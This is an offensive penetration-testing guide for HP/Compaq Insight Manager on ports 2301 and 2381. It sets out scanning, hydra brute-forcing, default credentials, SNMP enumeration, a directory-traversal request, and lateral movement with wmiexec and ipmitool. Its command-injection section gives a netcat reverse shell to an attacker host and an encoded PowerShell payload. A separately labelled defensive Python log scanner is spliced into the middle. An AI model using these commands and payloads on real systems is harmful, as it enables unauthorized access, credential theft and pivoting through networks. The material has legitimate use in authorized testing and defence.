Compaq HP Insight Manager - Port 2301, 2381

Basic info

HP Insight Manager, formerly known as Compaq Insight Manager (CIM), is a system management tool designed to monitor the hardware and status of HP servers and networking devices. It often exposes web interfaces, SNMP services, and other control endpoints that are prone to vulnerabilities, especially in outdated deployments. Attackers can leverage these weaknesses for unauthorized access, network reconnaissance, and privilege escalation.

Detecting HP Insight Manager Services in Network Scans

Nmap Fingerprinting and Banner Grabbing

To identify hosts running HP Insight Manager, scan for known ports:

nmap -p 2301,2381 -sV -T4 <target-ip>

Expected output:

  • TCP 2301 – HTTP interface (Compaq Insight Manager)

  • TCP 2381 – HTTPS interface (HP System Management Homepage)

Check for known signatures like:

Compaq HTTP Server
HP System Management Homepage

Web Interface Enumeration and Vulnerability Mapping

HTTP/HTTPS Portal Access

Access via browser:

  • http://<target-ip>:2301

  • https://<target-ip>:2381

Inspect for:

  • Login portal

  • Firmware versions

  • Server model identifiers

  • System status panels

Use automated tools to brute-force credentials and enumerate hidden endpoints:

hydra -l Administrator -P passwords.txt <target-ip> http-get /index.htm

Check for default credentials such as:

  • Administrator:admin

  • admin:admin

  • root:compaq


SNMP Enumeration on Insight Manager-Enabled Devices

SNMP Public Community String Access

Run the following:

snmpwalk -v 1 -c public <target-ip>

Commonly exposed information:

  • Server model and serial

  • Operating system and software versions

  • Installed hardware (disks, memory, CPU)

  • Active interfaces and IPs

  • Logged-in users

Check for access via:

onesixtyone -c community.txt <target-ip>

If default strings like public, private, or compaq work, escalate to full reconnaissance or pivoting.


Leveraging Known CVEs Against HP Insight Manager

Historical Vulnerabilities

  1. CVE-2004-0658 – Buffer Overflow in HTTP service on port 2301 (Compaq Insight Manager)

    • Can be exploited to crash the service or potentially execute remote code.

  2. CVE-2007-4044 – Directory traversal in HP System Management Homepage (<=2.1.9)

    • Exploitable via ../../../ in URL paths.

Example request:

GET /cgi-bin/../../../windows/win.ini HTTP/1.0
Host: <target-ip>:2301

  3. CVE-2009-4187 – XSS vulnerability in system homepage

    • Used for persistent admin session hijack or phishing within the local network.

Check version in the page footer or in /hpdiags/hpdiags.xml.


Gaining Access Through Misconfigurations

File Disclosure via Web Interface

Use DirBuster or ffuf:

ffuf -u http://<target-ip>:2301/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt

Look for accessible paths like:

  • /hpdiags/

  • /compaq/

  • /logs/

  • /config/

  • /system/

These may expose backup files, logs with credentials, or full configuration exports.


Exploiting Administrative Interfaces for Command Execution

Remote Command Injection (Older Firmware)

If the system allows hardware control (e.g., fan speed, reboots) via HTTP endpoints, inspect POST requests with tools like Burp Suite.

Inject:

; nc -e /bin/sh <attacker-ip> 4444

Or:

| powershell -EncodedCommand <payload>

Look for parameters in URLs or forms like:

  • /set_config.cgi

  • /change_settings.cgi

  • /run_task.cgi
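A defender-side counterpart to the traversal request and the injection strings shown above, as an added example that is not part of the original page: a Python check that flags both patterns in web access logs from the management interface. The log lines are constructed and the common log format is an assumption; POST bodies do not appear in such logs and need proxy or WAF capture instead.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in common log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.htm HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /cgi-bin/../../../windows/win.ini HTTP/1.0" 404 0
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /cgi-bin/%252e%252e/%252e%252e/windows/win.ini HTTP/1.0" 404 0
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /set_config.cgi?fan=50%3B%20id HTTP/1.1" 200 20
10.0.0.6 - - [01/Jan/2024:10:02:00 +0000] "GET /set_config.cgi?fan=50&mode=auto HTTP/1.1" 200 20
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')  # a ".." path segment
# ';' can be a legitimate parameter separator in some apps; tune per endpoint.
SHELL_META = re.compile(r'[;|`]|\$\(|&&')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client_ip, [findings]) for one log line, or None if unparsable."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    findings = []
    if TRAVERSAL.search(fully_decode(parts.path)):
        findings.append("path-traversal")
    if SHELL_META.search(fully_decode(parts.query)):
        findings.append("shell-metacharacter")
    return client, findings

def scan(log_text):
    """Return only the parsed lines that produced at least one finding."""
    results = [classify(line) for line in log_text.splitlines()]
    return [r for r in results if r and r[1]]

if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, ",".join(findings))
```

Decoding before matching is what catches the double-encoded `%252e%252e` variant, which a literal `../` signature would miss.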


Gaining Lateral Movement from Insight Manager Systems

Insight Manager systems often reside on privileged segments and interact with:

  • Active Directory for authentication

  • IPMI/iLO for hardware management

  • Other HP management suites via SNMP and WMI

Dump credentials from accessible pages or captured traffic, then pivot using:

wmiexec.py domain/user:password@<target>

Or extract stored iLO/IPMI credentials and reuse them:

ipmitool -I lanplus -H <target> -U admin -P password chassis power status
